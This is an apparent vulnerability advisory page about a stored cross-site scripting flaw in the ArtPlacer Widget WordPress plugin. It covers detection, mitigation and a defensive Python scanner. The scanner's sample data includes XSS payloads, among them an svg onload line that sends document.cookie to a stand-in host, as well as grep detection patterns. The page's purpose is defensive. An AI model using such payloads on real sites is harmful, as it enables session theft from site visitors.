CVE-2026-24555
BaseFortify

Publication date: 2026-01-23

Last updated on: 2026-04-28

Assigner: Patchstack

Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in artplacer ArtPlacer Widget artplacer-widget allows Stored XSS. This issue affects ArtPlacer Widget: from n/a through <= 2.23.2.
Meta Information

Generated: 2026-06-16
AI Q&A: 2026-01-23
EPSS Evaluated: 2026-06-15
Affected Vendors & Products

Vendor      Product            Version / Range
artplacer   artplacer_widget   up to 2.23.1 (inclusive)
CWE

CWE-79: The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
AI Quick Actions
Executive Summary

CVE-2026-24555 is a Stored Cross-Site Scripting (XSS) vulnerability in the WordPress ArtPlacer Widget plugin, versions up to 2.23.1. The plugin does not neutralize user-controllable input before placing it in the pages it generates (CWE-79), so an attacker can persist malicious script in plugin data. Exploitation requires an account with elevated privileges on the target site (the advisory names the Contributor or Developer roles) and user interaction with crafted content; once stored, the payload executes in the browsers of other visitors who load the affected pages. [1]

Impact Analysis

Because the payload is stored server-side, it runs for every visitor who loads the affected page, not only for the account that submitted it. Possible effects include unwanted redirects, display of unauthorized advertisements, or other injected HTML and script executing in the visitor's session. Exploitation requires a privileged account and user interaction, which limits the risk; the overall severity is moderate, with a CVSS score of 6.5. [1]

Detection Guidance

Detection involves monitoring for script injection in the ArtPlacer Widget settings and content on your WordPress site, especially changes made by accounts with Contributor or Developer privileges. Web server logs are only a partial source: they record GET query strings, referers and user agents but not POST bodies, and payloads are normally percent-encoded in transit, so a search for a literal <script must be paired with its encoded form. Commands to assist detection might include log analysis tools or grep commands such as: grep -i '<script' /path/to/access.log or grep -E '(<script|%3Cscript|javascript:|onerror=|onerror%3D)' /path/to/access.log. The authoritative check for a stored XSS is the stored data itself: review the plugin's persisted widget configuration in wp_options and wp_postmeta, and inspect the rendered HTML of affected pages with a browser developer console or a scanning tool for script that the plugin should not have emitted. [1]
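The following script is an added example, not code from the BaseFortify page or from the ArtPlacer Widget plugin. It applies the detection logic above to constructed data: it decodes percent- and entity-encoded text before matching (so the `%3Cscript%3E` case that a raw grep misses is caught), scans combined-format access-log lines for indicators in the request path, referer and user agent, and separately scans stored values as they would be exported from `wp_options` and `wp_postmeta`. The log lines, option names and `page=widget-settings` admin URL are all constructed for illustration and are not identifiers from the plugin.

```python
"""Scan constructed WordPress access-log lines and stored option values for
XSS indicators. Added example; all sample data is constructed and is not
taken from the advisory or the ArtPlacer Widget plugin."""
import html
import re
from urllib.parse import unquote

# Indicators of HTML/JS injection, applied to DECODED text, case-insensitive.
XSS_PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "js_uri": re.compile(r"javascript\s*:", re.I),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "svg_or_img_tag": re.compile(r"<\s*(svg|img|iframe|object|embed)\b", re.I),
    "data_html_uri": re.compile(r"data\s*:\s*text/html", re.I),
}

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def decode_fully(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding and HTML entities so a pattern for
    '<script' is not defeated by %3Cscript%3E, %253C... or &lt;script&gt;."""
    current = value
    for _ in range(rounds):
        decoded = html.unescape(unquote(current))
        if decoded == current:
            break
        current = decoded
    return current


def find_indicators(text: str) -> list[str]:
    """Names of XSS_PATTERNS that match the decoded text, in dict order."""
    decoded = decode_fully(text)
    return [name for name, pat in XSS_PATTERNS.items() if pat.search(decoded)]


def scan_access_log(lines):
    """Return (line_no, ip, method, path, indicators) per suspicious request.
    Only the request line, referer and user agent are visible here; POST
    bodies are not written to access logs, so this check is partial."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        checked = " ".join((m["path"], m["referer"], m["ua"]))
        indicators = find_indicators(checked)
        if indicators:
            hits.append((n, m["ip"], m["method"], m["path"], indicators))
    return hits


def scan_stored_values(rows):
    """rows: iterable of (location, value) as exported from wp_options or
    wp_postmeta. A stored XSS payload lives here, so this is the check that
    settles whether a site is actually affected."""
    hits = []
    for location, value in rows:
        indicators = find_indicators(value)
        if indicators:
            hits.append((location, indicators))
    return hits


# Constructed sample data (not real traffic, not real plugin settings).
SAMPLE_LOG = [
    '203.0.113.5 - - [23/Jan/2026:10:01:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 512 "https://example.test/wp-admin/" "Mozilla/5.0"',
    '203.0.113.9 - - [23/Jan/2026:10:01:05 +0000] "GET /wp-admin/admin.php?page=widget-settings&title=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [23/Jan/2026:10:02:00 +0000] "GET /shop/ HTTP/1.1" 200 2048 "https://evil.test/?x=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E" "curl/8.0"',
    '198.51.100.8 - - [23/Jan/2026:10:02:30 +0000] "GET /about/ HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

SAMPLE_OPTIONS = [
    ("wp_options:widget_sample[2][title]", "Featured Art"),
    ("wp_options:widget_sample[3][title]",
     'Gallery<svg onload=fetch("https://evil.test/?c="+document.cookie)>'),
    ("wp_postmeta:post 42:_gallery_caption",
     "Oil on canvas &lt;script&gt;alert(1)&lt;/script&gt;"),
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("log   :", hit)
    for hit in scan_stored_values(SAMPLE_OPTIONS):
        print("stored:", hit)
```

Run against real data by replacing SAMPLE_LOG with the lines of your access log and SAMPLE_OPTIONS with an export of the plugin's rows from wp_options and wp_postmeta. Matches in the log point at who submitted a payload and when; matches in the stored rows are the ones that require cleanup, because the payload will keep executing for every visitor until the row is fixed.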

Mitigation Strategies

Immediate mitigation steps include reviewing and restricting user privileges to limit who holds the Contributor or Developer roles, since exploitation requires such an account. Avoid clicking suspicious links or submitting untrusted forms within the WordPress admin area. Monitor and sanitize inputs where possible. Until a fixed release of the plugin is installed, consider disabling or removing the ArtPlacer Widget plugin. Web Application Firewall (WAF) rules that block common XSS payloads can reduce the chance of a new payload being stored, but a WAF only inspects the submission, not the later page renders; a payload that was stored before the rule was added keeps executing until the affected widget settings or content are cleaned up, so pair any WAF rule with a review of the plugin's stored data. [1]
